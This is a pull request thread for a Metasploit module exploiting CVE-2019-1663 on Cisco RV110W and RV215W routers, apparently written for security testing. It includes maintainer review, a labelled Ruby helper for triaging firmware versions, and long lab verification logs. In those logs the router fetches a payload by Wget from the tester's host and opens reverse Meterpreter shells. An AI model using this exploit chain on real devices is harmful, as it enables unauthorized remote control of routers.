qkaiser commented Jul 27, 2019

This pull request adds support for Cisco RV110W and RV215W models that are affected by the same issue as the RV130 (CVE-2019-1663).

I wrote a check function that fingerprints firmware versions based on a file that is available to unauthenticated users. This is the best method I could find given that the httpd server does not leak information through headers. If you can think of a better method, let me know :)

I used the existing method of deprecation given that #12027 hasn't landed yet. I'll let @wvu-r7 refactor the module with the proper deprecation method when it lands.

One open question is whether it is possible to set a default payload based on the chosen target, so that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Verification

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.5)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.5
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 6
target => 6
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/g4KoWbXVnJ
[*] Local IP: http://192.168.1.100:8080/g4KoWbXVnJ
[*] Client 192.168.1.1 (Wget) requested /g4KoWbXVnJ
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 16 opened (192.168.1.100:4444 -> 192.168.1.1:37543) at
2019-07-26 15:48:47 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 782 created.
Channel 1 created.
nvram get fw_version
1.1.0.5
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 16 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.6)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.6
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 7
target => 7
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/ubI9mgBj
[*] Local IP: http://192.168.1.100:8080/ubI9mgBj
[*] Client 192.168.1.1 (Wget) requested /ubI9mgBj
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:34516) at
2019-07-26 15:42:11 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 754 created.
Channel 1 created.
nvram get fw_version
1.1.0.6
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.14)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 8
target => 8
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Fv3IrUrcS5Xb37
[*] Local IP: http://192.168.1.100:8080/Fv3IrUrcS5Xb37
[*] Client 192.168.1.1 (Wget) requested /Fv3IrUrcS5Xb37
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:56255) at
2019-07-26 15:35:54 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 730 created.
Channel 1 created.
nvram get fw_version
1.2.0.14
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.15)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 9
target => 9
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/5JDmdNNlZSjCO
[*] Local IP: http://192.168.1.100:8080/5JDmdNNlZSjCO
[*] Client 192.168.1.1 (Wget) requested /5JDmdNNlZSjCO
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 10 opened (192.168.1.100:4444 -> 192.168.1.1:49636) at
2019-07-26 15:29:18 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 807 created.
Channel 1 created.
nvram get fw_version
1.2.0.15
exit
exmeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 10 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Ulsp7WNdRpwoJA
[*] Local IP: http://192.168.1.100:8080/Ulsp7WNdRpwoJA
[*] Client 192.168.1.1 (Wget) requested /Ulsp7WNdRpwoJA
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.1:56965) at
2019-07-26 15:15:14 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 792 created.
Channel 1 created.
nvram get fw_version
1.3.0.7
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.8)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/hdtlzE
[*] Local IP: http://192.168.1.100:8080/hdtlzE
[*] Client 192.168.1.1 (Wget) requested /hdtlzE
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:34656) at
2019-07-26 14:58:59 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 770 created.
Channel 1 created.
nvraw get fw_version
/bin/sh: nvraw: not found
nvram get fw_version
1.3.0.8
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Updates #11613.
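
An added example (not part of the pull request or the module's code): a Ruby helper that parses the `check` banner shown in the verification logs above, to show why a fingerprint shared by vulnerable and fixed firmware ends in "Cannot reliably check exploitability". The function names and the verdict rule are assumptions inferred from those logs.

```ruby
# Added example (not Metasploit code): interpret the "check" banner from the logs above.
BANNER = /Successfully identified device: Cisco (?<model>RV\d+W?) (?<rest>.+)\z/
Candidate = Struct.new(:version, :vulnerable)

# Parse one banner into a model name and the firmware versions the fingerprint matches.
def parse_banner(text)
  line = text.gsub(/\s+/, ' ').strip # the pasted logs wrap long banners
  m = BANNER.match(line)
  return nil unless m
  candidates = m[:rest].split(/,\s*|\s+or\s+/).map do |item|
    version = item[/\A\d+(?:\.\d+){3}/]
    raise ArgumentError, "unparsable version: #{item.inspect}" unless version
    Candidate.new(version, !item.include?('(not vulnerable)'))
  end
  { model: m[:model], candidates: candidates }
end

# Assumption drawn from the logs: a fingerprint shared by vulnerable and fixed
# releases cannot be decided from the fingerprint alone.
def verdict(parsed)
  flags = parsed[:candidates].map(&:vulnerable).uniq
  return :vulnerable if flags == [true]
  return :not_vulnerable if flags == [false]
  :ambiguous
end

# Settle an ambiguous fingerprint with the version the device itself reports
# (the sessions above read it with `nvram get fw_version`).
def resolve(parsed, fw_version)
  hit = parsed[:candidates].find { |c| c.version == fw_version }
  return :unknown_version unless hit
  hit.vulnerable ? :vulnerable : :not_vulnerable
end

# Banners copied from the verification logs on this page.
ALL_VULN = '[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15'
SHARED = "[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1\n" \
         '(not vulnerable), 1.3.1.4 (not vulnerable)'

if __FILE__ == $PROGRAM_NAME
  [ALL_VULN, SHARED].each do |banner|
    parsed = parse_banner(banner)
    puts "#{parsed[:model]}: #{verdict(parsed)} #{parsed[:candidates].map(&:version).inspect}"
  end
  puts resolve(parse_banner(SHARED), '1.3.0.8')
end
```

For patch triage, an `:ambiguous` result means the device's reported firmware version has to be checked before it can be marked as fixed.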

bcoles added the module label Jul 27, 2019
wvu self-assigned this Jul 28, 2019

wvu commented Aug 1, 2019

Hi, @qkaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

> One open question is whether it is possible to set a default payload based on the chosen target? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

qkaiser commented Aug 2, 2019

> Hi, @qkaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

Thanks for trusting me with this.

> One open question is whether it is possible to set a default payload based on the chosen target? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.
>
> Yep! You can set DefaultOptions as per #10471.

Great! I just did that in the latest commit.

wvu commented Aug 22, 2019

I'll get this updated with #12223 once that lands, then I'll land this.

wvu commented Aug 30, 2019

@qkaiser: Hey, #12223 landed, and I've refactored deprecation here. Just waiting on tests to pass, and then I'll land this!

wvu added a commit that referenced this pull request Aug 30, 2019
wvu merged commit b0b7289 into rapid7:master Aug 30, 2019

wvu commented Aug 30, 2019

Release Notes

The exploit/linux/http/cisco_rv130_rmi_rce module has been moved to exploit/linux/http/cve_2019_1663_cisco_rmi_rce. Targets have also been added for RV110W and RV215W.
